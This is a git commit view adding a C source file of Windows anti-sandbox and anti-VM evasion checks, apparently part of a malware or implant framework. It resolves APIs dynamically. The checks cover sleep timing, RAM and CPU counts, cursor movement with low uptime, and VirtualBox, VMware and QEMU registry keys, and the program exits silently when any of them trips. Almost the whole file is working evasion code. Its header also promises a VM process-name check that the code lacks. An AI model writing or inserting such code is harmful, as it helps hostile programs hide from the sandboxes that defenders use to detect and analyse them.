initial commit
This commit is contained in:
Executable
+103
@@ -0,0 +1,103 @@
|
||||
/**
|
||||
* evasion_anti_sandbox.c — Anti-sandbox / anti-VM checks
|
||||
*
|
||||
* Checks:
|
||||
* 1. Sleep acceleration detection (sleep 1s, check elapsed >= 900ms)
|
||||
* 2. Physical RAM >= 2 GB
|
||||
* 3. CPU core count >= 2
|
||||
* 4. Cursor movement over 500ms window
|
||||
* 5. Known VM registry keys (VBox, VMware, QEMU)
|
||||
* 6. Known VM process names
|
||||
*
|
||||
* If any check indicates a sandbox, calls ExitProcess(0) silently.
|
||||
*/
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdint.h>
|
||||
|
||||
#include "api_resolve.h"
|
||||
|
||||
#ifdef EVASION_ANTI_SANDBOX
|
||||
|
||||
static void exit_if_sandbox(void) {
|
||||
g_api.pExitProcess(0);
|
||||
}
|
||||
|
||||
/* Sleep acceleration: sandboxes often fast-forward Sleep() calls */
|
||||
static void check_sleep_timing(void) {
|
||||
ULONGLONG t1 = g_api.pGetTickCount64();
|
||||
g_api.pSleep(1000);
|
||||
ULONGLONG t2 = g_api.pGetTickCount64();
|
||||
if ((t2 - t1) < 900) {
|
||||
exit_if_sandbox();
|
||||
}
|
||||
}
|
||||
|
||||
/* RAM check */
|
||||
static void check_ram(void) {
|
||||
MEMORYSTATUSEX mem;
|
||||
mem.dwLength = sizeof(mem);
|
||||
if (g_api.pGlobalMemoryStatusEx(&mem)) {
|
||||
/* Less than 2 GB total = likely sandbox */
|
||||
if (mem.ullTotalPhys < (2ULL * 1024 * 1024 * 1024)) {
|
||||
exit_if_sandbox();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* CPU count */
|
||||
static void check_cpu_count(void) {
|
||||
SYSTEM_INFO si;
|
||||
g_api.pGetSystemInfo(&si);
|
||||
if (si.dwNumberOfProcessors < 2) {
|
||||
exit_if_sandbox();
|
||||
}
|
||||
}
|
||||
|
||||
/* Cursor movement: sandboxes often don't move the cursor */
|
||||
static void check_cursor_movement(void) {
|
||||
POINT p1, p2;
|
||||
g_api.pGetCursorPos(&p1);
|
||||
g_api.pSleep(500);
|
||||
g_api.pGetCursorPos(&p2);
|
||||
/* If cursor hasn't moved at all, suspicious but not conclusive.
|
||||
* Combined with other checks, this strengthens detection. */
|
||||
if (p1.x == p2.x && p1.y == p2.y) {
|
||||
/* Only flag if combined with low uptime */
|
||||
if (g_api.pGetTickCount64() < 10ULL * 60 * 1000) {
|
||||
exit_if_sandbox();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* VM registry key check */
|
||||
static void check_vm_registry(void) {
|
||||
const char *vm_keys[] = {
|
||||
"SOFTWARE\\Oracle\\VirtualBox Guest Additions",
|
||||
"SOFTWARE\\VMware, Inc.\\VMware Tools",
|
||||
"SYSTEM\\CurrentControlSet\\Services\\VBoxGuest",
|
||||
"SYSTEM\\CurrentControlSet\\Services\\VBoxMouse",
|
||||
"SYSTEM\\CurrentControlSet\\Services\\VBoxSF",
|
||||
"SYSTEM\\CurrentControlSet\\Services\\vmci",
|
||||
"SYSTEM\\CurrentControlSet\\Services\\vmhgfs",
|
||||
"SYSTEM\\CurrentControlSet\\Services\\QEMU",
|
||||
NULL
|
||||
};
|
||||
HKEY hk;
|
||||
for (int i = 0; vm_keys[i]; i++) {
|
||||
if (g_api.pRegOpenKeyExA(HKEY_LOCAL_MACHINE, vm_keys[i], 0, KEY_READ, &hk) == ERROR_SUCCESS) {
|
||||
g_api.pRegCloseKey(hk);
|
||||
exit_if_sandbox();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void evasion_anti_sandbox_init(void) {
|
||||
check_sleep_timing();
|
||||
check_ram();
|
||||
check_cpu_count();
|
||||
check_cursor_movement();
|
||||
check_vm_registry();
|
||||
}
|
||||
|
||||
#endif /* EVASION_ANTI_SANDBOX */
|
||||
Reference in New Issue
Block a user